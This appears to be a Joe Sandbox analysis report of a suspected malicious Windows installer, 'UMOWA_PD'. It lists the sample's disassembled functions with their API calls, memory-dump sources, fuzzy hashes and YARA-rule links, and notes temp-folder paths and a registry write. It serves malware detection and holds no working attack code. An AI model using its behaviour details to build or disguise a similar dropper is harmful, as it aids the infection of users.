                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                    • String ID:
                                                                                    • API String ID: 1849352358-0
                                                                                    • Opcode ID: b4553b6f8f96a3615d4cb1d74016621c3cb3daa09826911c1e5c071ec9b0e61c
                                                                                    • Instruction ID: 002387d4b88dbb62f40c54eb0dee3f9a721ef30fc2dbb8ae50818b7fec09efb0
                                                                                    • Opcode Fuzzy Hash: b4553b6f8f96a3615d4cb1d74016621c3cb3daa09826911c1e5c071ec9b0e61c
                                                                                    • Instruction Fuzzy Hash: 0F21F872A00119AFCB15DF98DE45AEEBBB5EB08304F14003AF945F62A0D7789D41DB98
                                                                                    Function 00401E53 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetDC.USER32(?), ref: 00401E56
                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
                                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00401E89
                                                                                    • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                    • String ID:
                                                                                    • API String ID: 3808545654-0
                                                                                    • Opcode ID: 12fc5c0feb0b51e7a773ba9164babbc76b3b82788c0ea370a0f868ab0e4caa48
                                                                                    • Instruction ID: 1c21784e8a12ec6bf8935da156a17e2c336e66cb5fe6e154f3a2125ab74843e9
                                                                                    • Opcode Fuzzy Hash: 12fc5c0feb0b51e7a773ba9164babbc76b3b82788c0ea370a0f868ab0e4caa48
                                                                                    • Instruction Fuzzy Hash: 5A018871954240EFE7015BB4AE9ABDD3FB5AF15301F10497AF141B61E2C6B90445DB3C
                                                                                    Function 6FE216BD Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6FE222D8,?,00000808), ref: 6FE216D5
                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6FE222D8,?,00000808), ref: 6FE216DC
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6FE222D8,?,00000808), ref: 6FE216F0
                                                                                    • GetProcAddress.KERNEL32(6FE222D8,00000000), ref: 6FE216F7
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6FE21700
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15222039276.000000006FE21000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FE20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15221966825.000000006FE20000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15222110605.000000006FE24000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15222184730.000000006FE26000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6fe20000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                    • String ID:
                                                                                    • API String ID: 1148316912-0
                                                                                    • Opcode ID: e44ae849cccabaa2e65c50fef234b32170f11982fe8964ae485125db39c471e3
                                                                                    • Instruction ID: 7c9d1da0ef3c09c0e411fe5abd3c536bcf6a2b54004c5db251dfbc976506c2af
                                                                                    • Opcode Fuzzy Hash: e44ae849cccabaa2e65c50fef234b32170f11982fe8964ae485125db39c471e3
                                                                                    • Instruction Fuzzy Hash: 95F0A7721061387FCA2117A78C0CC9B7E9DEF8B2F5B010312F318D119199614C11C7F2
                                                                                    Function 00401C48 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
                                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Timeout
                                                                                    • String ID: !
                                                                                    • API String ID: 1777923405-2657877971
                                                                                    • Opcode ID: 0b60248b2d317c3fadb7ed9affa728e8142f9e62085aaabdbec9824b10747ad3
                                                                                    • Instruction ID: dc9a0f57bab323a5eda2152a626e9899419b02716f24503a8b80c8a4184e75e9
                                                                                    • Opcode Fuzzy Hash: 0b60248b2d317c3fadb7ed9affa728e8142f9e62085aaabdbec9824b10747ad3
                                                                                    • Instruction Fuzzy Hash: E921AD71D1421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941CB98
                                                                                    Function 00404D4D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DEE
                                                                                    • wsprintfW.USER32 ref: 00404DF7
                                                                                    • SetDlgItemTextW.USER32(?,00422F08), ref: 00404E0A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                    • String ID: %u.%u%s%s
                                                                                    • API String ID: 3540041739-3551169577
                                                                                    • Opcode ID: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
                                                                                    • Instruction ID: 33e626053c854acaf0ea976fdeb40ece7b69d158cb37adfcb571004cb6629101
                                                                                    • Opcode Fuzzy Hash: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
                                                                                    • Instruction Fuzzy Hash: 2C11EB7360412877DB00666DAC46EAE329DDF85334F250237FA66F31D5EA79C92242E8
                                                                                    Function 0040248F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nscE8.tmp,00000023,00000011,00000002), ref: 004024DA
                                                                                    • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nscE8.tmp,00000000,00000011,00000002), ref: 0040251A
                                                                                    • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nscE8.tmp,00000000,00000011,00000002), ref: 00402602
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseValuelstrlen
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nscE8.tmp
                                                                                    • API String ID: 2655323295-3127785682
                                                                                    • Opcode ID: 8b31c99460fdf6c2949f4debf72b45d412ee72b0ef63aad6f5470ffe0bc1fffc
                                                                                    • Instruction ID: 9515a87f615354861ff9cc8d48f56862c3e7cd04d157db2ad705c0a1b7eb65e0
                                                                                    • Opcode Fuzzy Hash: 8b31c99460fdf6c2949f4debf72b45d412ee72b0ef63aad6f5470ffe0bc1fffc
                                                                                    • Instruction Fuzzy Hash: 45116D71900118BEEB11EFA5DE59AAEBAB4AF54318F10443FF504B61C1C7B98E419A58
                                                                                    Function 00405E9B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nscE8.tmp,?,00405F0F,C:\Users\user\AppData\Local\Temp\nscE8.tmp,C:\Users\user\AppData\Local\Temp\nscE8.tmp, 4v,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,76E63420,C:\Users\user\AppData\Local\Temp\,00434000), ref: 00405EA9
                                                                                    • CharNextW.USER32(00000000), ref: 00405EAE
                                                                                    • CharNextW.USER32(00000000), ref: 00405EC6
                                                                                    Strings
                                                                                    • C:\Users\user\AppData\Local\Temp\nscE8.tmp, xrefs: 00405E9C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: CharNext
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nscE8.tmp
                                                                                    • API String ID: 3213498283-3127785682
                                                                                    • Opcode ID: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
                                                                                    • Instruction ID: c4cc3313bff2df52cb6c0caf4e8c88866a305d48728ab5da0ab5d468dade8cef
                                                                                    • Opcode Fuzzy Hash: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
                                                                                    • Instruction Fuzzy Hash: E4F0F631910F2595DA317764CC44E7766B8EB54351B00803BD282B36C1DBF88A819FEA
                                                                                    Function 00403B5E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FreeLibrary.KERNEL32(?,76E63420,00000000,C:\Users\user\AppData\Local\Temp\,00403B36,00403A4C,?,?,00000008,0000000A,0000000C), ref: 00403B78
                                                                                    • GlobalFree.KERNEL32(004E4570), ref: 00403B7F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: Free$GlobalLibrary
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$pEN
                                                                                    • API String ID: 1100898210-205275323
                                                                                    • Opcode ID: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
                                                                                    • Instruction ID: 6899552f53244e150386b1952d758f3f927a5bb415edc3c38dc9ad64461d36a3
                                                                                    • Opcode Fuzzy Hash: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
                                                                                    • Instruction Fuzzy Hash: 59E08C3250102057CA211F05ED04B1AB7B8AF45B27F06452AE8407B26287B42C838FD8
                                                                                    Function 00405DF0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034E9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405DF6
                                                                                    • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004034E9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405E00
                                                                                    • lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405E12
                                                                                    Strings
                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DF0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: CharPrevlstrcatlstrlen
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                    • API String ID: 2659869361-3355392842
                                                                                    • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                                    • Instruction ID: dcf52917e326d6ada13c2a72ecce68a7b96b6e8782615359caad44c872c99b85
                                                                                    • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                                    • Instruction Fuzzy Hash: EBD05EB1101634AAC2116B48AC04CDF62AC9E86704381402AF141B20A6C7785D6296ED
                                                                                    Function 6FE210E1 Relevance: 6.4, APIs: 5, Instructions: 145memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 6FE21171
                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 6FE211E3
                                                                                    • GlobalFree.KERNEL32 ref: 6FE2124A
                                                                                    • GlobalFree.KERNEL32(?), ref: 6FE2129B
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6FE212B1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15222039276.000000006FE21000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FE20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15221966825.000000006FE20000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15222110605.000000006FE24000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15222184730.000000006FE26000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6fe20000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$Free$Alloc
                                                                                    • String ID:
                                                                                    • API String ID: 1780285237-0
                                                                                    • Opcode ID: e0e382d203bf274dd57ad839156402fcf5c4da8a502d175dd6f6ea0779e41941
                                                                                    • Instruction ID: 2fa73e556298d12a5b31c45a882f8d8d669513c67b65a0b2943124cdc3bccc5b
                                                                                    • Opcode Fuzzy Hash: e0e382d203bf274dd57ad839156402fcf5c4da8a502d175dd6f6ea0779e41941
                                                                                    • Instruction Fuzzy Hash: 7C517D76900705DFDB00CFA8CA44E667FEAFB47328B24411AF944DB254FB7AAA11DB50
                                                                                    Function 00402643 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll), ref: 0040269A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: lstrlen
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nscE8.tmp$C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll
                                                                                    • API String ID: 1659193697-2384673828
                                                                                    • Opcode ID: 34c7efb81093797c11027e5546ec3e843140785abad449b49019a9492c78efcd
                                                                                    • Instruction ID: 24c820640bf83c35ca015f911653a3ecbd9f7363fc1a8715c972f2d02b23d4ac
                                                                                    • Opcode Fuzzy Hash: 34c7efb81093797c11027e5546ec3e843140785abad449b49019a9492c78efcd
                                                                                    • Instruction Fuzzy Hash: 11113A72A40311BBCB00BBB19E46EAE36709F50748F60443FF402F61C0D6FD4991565E
                                                                                    Function 0040301E Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DestroyWindow.USER32(00000000,00000000,004031FC,?), ref: 00403031
                                                                                    • GetTickCount.KERNEL32 ref: 0040304F
                                                                                    • CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 0040306C
                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 0040307A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                    • String ID:
                                                                                    • API String ID: 2102729457-0
                                                                                    • Opcode ID: 1f524868e2ec5e9a115d67c2f52ec07950574c6e8f58c79c8196e6c31eccfe04
                                                                                    • Instruction ID: fc94ebd698381dfc42c8ec832a7b78cf8da54aaf5e1058e2af7a384a9ccf94d3
                                                                                    • Opcode Fuzzy Hash: 1f524868e2ec5e9a115d67c2f52ec07950574c6e8f58c79c8196e6c31eccfe04
                                                                                    • Instruction Fuzzy Hash: 0FF05471602621ABC6306F50BD08A9B7E69FB44B53F41087AF045B11A9CB7548828B9C
                                                                                    Function 0040551A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsWindowVisible.USER32(?), ref: 00405549
                                                                                    • CallWindowProcW.USER32(?,?,?,?), ref: 0040559A
                                                                                      • Part of subcall function 004044EC: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044FE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                    • String ID:
                                                                                    • API String ID: 3748168415-3916222277
                                                                                    • Opcode ID: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
                                                                                    • Instruction ID: 85372f17a9103eb01fcdfd8a19690b8d052d76dd043ca16804f8a0d8951f02ed
                                                                                    • Opcode Fuzzy Hash: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
                                                                                    • Instruction Fuzzy Hash: 53017171200609BFDF309F51DD80AAB362AFB84750F540437FA047A1D5C7B98D52AE69
                                                                                    Function 00405F76 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F86
                                                                                    • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405F9E
                                                                                    • CharNextA.USER32(00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FAF
                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
